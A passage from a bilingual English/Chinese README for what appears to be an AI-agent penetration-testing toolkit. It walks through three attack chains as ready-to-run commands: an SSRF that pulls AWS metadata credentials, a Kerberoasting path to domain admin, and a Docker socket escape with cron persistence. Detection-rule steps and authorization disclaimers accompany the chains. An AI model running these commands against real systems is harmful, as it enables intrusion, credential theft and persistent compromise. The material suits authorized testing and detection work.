
vuln-scanner：

nuclei -l live-hosts.txt -severity critical,high -json -o nuclei.json

Step 4: Prioritize targets

步骤4：目标优先级

"Analyze nuclei.json. Which hosts are most likely to give initial access?"

"分析nuclei.json。哪些主机最有可能获得初始访问？"

recon-advisor:

recon-advisor：

1. Parses JSON

1. 解析JSON

2. Identifies: SSRF in admin panel, outdated WordPress, exposed Git repo

2. 识别：管理面板中的SSRF、过时的WordPress、暴露的Git仓库

3. Recommends: "Target admin.acme-corp.com/debug (SSRF) for cloud metadata access"

3. 推荐："以admin.acme-corp.com/debug（SSRF）为目标，获取云元数据访问权限"

Step 5: Exploit SSRF

步骤5：利用SSRF

"Exploit SSRF at admin.acme-corp.com/debug to access AWS metadata and pivot to S3."

"利用admin.acme-corp.com/debug处的SSRF访问AWS元数据并转向S3。"

exploit-chainer:

exploit-chainer：

curl "https://admin.acme-corp.com/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

Extracts AWS keys

提取AWS密钥

aws s3 ls --profile stolen-creds

Finds sensitive data bucket

发现敏感数据存储桶

Step 6: Build detection

步骤6：构建检测规则

"Build Sigma and Splunk rules to detect SSRF to cloud metadata endpoints."

"构建Sigma和Splunk规则以检测针对云元数据端点的SSRF。"

detection-engineer:

detection-engineer：

Produces Sigma rule + Splunk SPL + AWS CloudTrail query

生成Sigma规则 + Splunk SPL + AWS CloudTrail查询

Step 7: Report

步骤7：报告

"Generate executive summary and technical findings report."

"生成执行摘要和技术发现报告。"

report-generator:

report-generator：

Outputs Markdown with CVSS scores, remediation steps, attack timeline

输出包含CVSS评分、修复步骤、攻击时间线的Markdown报告

undefined

undefined

Example 2: AD Privilege Escalation from User to Domain Admin

案例2：从域用户到域管理员的AD权限提升

bash

undefined

bash

undefined

Starting point: domain user alice@corp.local

起点：域用户alice@corp.local

Step 1: Enumerate AD

步骤1：枚举AD

"I have alice@corp.local credentials. Enumerate AD and find paths to Domain Admins."

"我有alice@corp.local凭证。枚举AD并找到通往Domain Admins的路径。"

ad-attacker:

ad-attacker：

bloodhound-python -u alice -p 'Password123' -d corp.local -dc dc01.corp.local -c All --zip

Uploads to BloodHound GUI or parses JSON locally

上传到BloodHound GUI或本地解析JSON

Step 2: Identify attack path

步骤2：识别攻击路径

"Analyze BloodHound data. What's the shortest path to DA?"

"分析BloodHound数据。到DA的最短路径是什么？"

ad-attacker:

ad-attacker：

Finds: alice → MemberOf → IT-Admins → GenericWrite → SVC_SQL → Kerberoastable → DA group

发现：alice → MemberOf → IT-Admins → GenericWrite → SVC_SQL → 可Kerberoast → DA组

Step 3: Execute attack chain

步骤3：执行攻击链

"Execute the attack chain: GenericWrite to add SPN, Kerberoast SVC_SQL, crack hash."

"执行攻击链：GenericWrite添加SPN，Kerberoast SVC_SQL，破解哈希。"

ad-attacker:

ad-attacker：

1. Add SPN to SVC_SQL (GenericWrite abuse)

1. 为SVC_SQL添加SPN（滥用GenericWrite）

python3 addspn.py -u alice -p 'Password123' -t SVC_SQL -s HTTP/fake.corp.local corp.local/dc01

2. Kerberoast

GetUserSPNs.py corp.local/alice:Password123 -dc-ip dc01.corp.local -request -outputfile tgs.txt

3. Crack

3. 破解哈希

hashcat -m 13100 tgs.txt rockyou.txt

4. Validate DA access

4. 验证DA访问权限

netexec smb dc01.corp.local -u SVC_SQL -p 'CrackedPassword' --shares

Step 4: Build detection

步骤4：构建检测规则

"Build detection rules for GenericWrite SPN modification and Kerberoasting."

"为GenericWrite SPN修改和Kerberoasting构建检测规则。"

detection-engineer:

detection-engineer：

Sigma rule for Event ID 4742 (user object modified) + SPN change

针对事件ID 4742（用户对象修改）+ SPN变更的Sigma规则

Splunk correlation for 4742 → 4769 (TGS request) within 5 minutes

5分钟内4742 → 4769（TGS请求）的Splunk关联规则

undefined

undefined

Example 3: Container Escape to Host Root

案例3：容器逃逸到主机Root

bash

undefined

bash

undefined

Starting point: Shell inside Docker container

起点：Docker容器内的Shell

Step 1: Assess container environment

步骤1：评估容器环境

"I have a shell in a Docker container. Assess escape vectors."

"我在Docker容器内有一个Shell。评估逃逸向量。"

container-breakout:

container-breakout：

Checks: privileged flag, host PID namespace, mounted /var/run/docker.sock, capabilities

检查：特权标志、主机PID命名空间、挂载的/var/run/docker.sock、权限

Step 2: Exploit mounted docker.sock

步骤2：利用挂载的docker.sock

"docker.sock is mounted. Exploit it to escape to host."

"docker.sock已挂载。利用它逃逸到主机。"

container-breakout:

container-breakout：

docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash

Now root on host

现在获得主机Root权限

Step 3: Persistence

步骤3：持久化

"Establish persistence on the host as root."

"在主机上以Root权限建立持久化。"

c2-operator:

c2-operator：

Recommends: cron job, systemd service, SSH key injection

推荐：定时任务、systemd服务、SSH密钥注入

echo "* * * * * root /tmp/.update.sh" >> /host/etc/crontab

Step 4: Detection

步骤4：检测

"Build Falco rule to detect docker.sock abuse from containers."

"构建Falco规则以检测容器内对docker.sock的滥用。"

detection-engineer:

detection-engineer：

Falco rule for container process accessing /var/run/docker.sock

针对容器进程访问/var/run/docker.sock的Falco规则

undefined

undefined

Legal and Ethical Use

法律与伦理使用

Authorized testing only. All agents enforce scope guards:

Require explicit engagement scope (IP ranges, domains, authorization, dates)
Refuse out-of-scope actions
Log all commands for audit trails

Hard refusals for:

Denial of Service
Mass internet scanning
Unattended worm propagation
False-flag operations
Safety-of-life systems (medical, ICS/SCADA)

Users are responsible for obtaining proper authorization before testing. pentest-ai-agents is a research and education tool. Unauthorized testing is illegal.

**仅授权测试。**所有代理都执行范围防护：

需要明确的测试范围（IP范围、域名、授权、日期）
拒绝超出范围的操作
记录所有命令用于审计跟踪

严格拒绝以下操作：

拒绝服务攻击
大规模互联网扫描
无人值守的蠕虫传播
栽赃操作
生命安全系统（医疗、ICS/SCADA）

用户负责在测试前获得适当授权。pentest-ai-agents是研究和教育工具。未经授权的测试是非法的。

Contributing

贡献

Contributions welcome:

New agents (follow existing structure in
```
agents/
```
)
Tool integrations (add to
```
db/tools.json
```
)
Detection rules (expand
```
detection-engineer
```
ruleset)
Bug fixes and documentation improvements

See CONTRIBUTING.md for guidelines.

欢迎贡献：

新代理（遵循
```
agents/
```
中的现有结构）
工具集成（添加到
```
db/tools.json
```
）
检测规则（扩展
```
detection-engineer
```
规则集）
错误修复和文档改进

请查看CONTRIBUTING.md了解指南。

Resources

资源

Documentation
INSTALL.md - Detailed installation guide
Agent Reference - Full agent descriptions
Tool Matrix - Tool coverage by agent
GitHub Issues - Report bugs, request features

文档
INSTALL.md - 详细安装指南
代理参考 - 完整代理描述
工具矩阵 - 代理支持的工具覆盖
GitHub Issues - 报告Bug、请求功能

License

许可证

MIT License - see LICENSE

MIT许可证 - 查看LICENSE